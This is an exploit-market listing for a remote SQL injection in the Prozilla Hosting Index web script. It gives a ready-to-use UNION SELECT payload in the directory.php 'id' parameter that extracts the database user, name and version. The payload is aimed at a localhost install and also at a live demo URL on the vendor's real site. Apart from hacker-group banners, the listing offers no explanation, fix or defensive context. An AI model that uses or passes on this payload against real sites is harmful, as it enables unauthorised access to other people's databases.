[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Prozilla Hosting Index (id) Remote SQL Injection Vulnerability

Author
Snakespc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4229
Category
web applications
Date add
23-11-2008
Platform
unsorted
==============================================================
Prozilla Hosting Index (id) Remote SQL Injection Vulnerability
==============================================================


==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                =                          Script site: turnkeyzone.com   "directory.php"            =
                  ===================================Snakespc======================================

Exploit:
http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
********
demo:
http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
===================================================================================================================



#  0day.today [2024-12-25]  #